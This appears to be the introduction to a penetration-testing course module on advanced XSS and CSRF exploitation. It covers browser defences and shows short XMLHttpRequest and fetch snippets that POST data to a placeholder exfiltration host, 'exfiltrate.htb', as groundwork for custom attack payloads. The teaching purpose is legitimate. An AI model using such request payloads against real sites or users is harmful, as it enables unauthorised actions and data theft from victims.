Advanced XSS and CSRF Exploitation

In this module, we will discuss the exploitation of Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) vulnerabilities in modern web applications, focusing on writing custom payloads to achieve specific objectives.

Proficiency in fundamental concepts of JavaScript, CSRF, XSS, and SQL injection vulnerabilities is a prerequisite for this module. Therefore, we recommend completing the Cross-Site Scripting (XSS), Session Security, and SQL Injection Fundamentals modules beforehand.

Modern CSRF and XSS Exploitation in the Real-World

As we will discuss in this module, many security policies and security measures in modern web browsers restrict or prevent the basic exploitation of CSRF vulnerabilities. For instance, there are the Same-Origin policy, Cross-Origin Resource Sharing (CORS), and SameSite cookies, which we will all explore further in the upcoming sections.

As such, the exploitation of plain CSRF vulnerabilities has become increasingly rare in the real world. However, if we discover an XSS vulnerability, we can combine the exploitation of XSS and CSRF, resulting in a powerful tool that enables us to attack the vulnerable web application itself and potentially additional web applications in the victim's internal network.

To exploit CSRF and XSS vulnerabilities and interact with the vulnerable web application, we can use the XMLHttpRequest object or the more modern Fetch API. We can use both to make HTTP requests from JavaScript code while specifying HTTP parameters like the method, HTTP headers, or the request body.

For instance, we can send a POST request using the XMLHttpRequest object by specifying the URL in the call to xhr.open, setting HTTP headers using the xhr.setRequestHeader function, and specifying request body parameters in the call to xhr.send:

var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://exfiltrate.htb/', false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('param1=hello&param2=world');

On the other hand, we can send the same request using the Fetch API like so:

const response = await fetch('http://exfiltrate.htb/', {
    method: "POST",
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'param1=hello&param2=world',
  });

The function fetch expects the URL in the first parameter. We can pass all additional request parameters in an object in the second parameter.

Note: Like the whitebox penetration testing process, debugging and testing our XSS and CSRF exploits locally before sending them to victims is paramount; this ensures that during engagements, we avoid bugs that may lead to unintended behaviors, such as denial of service.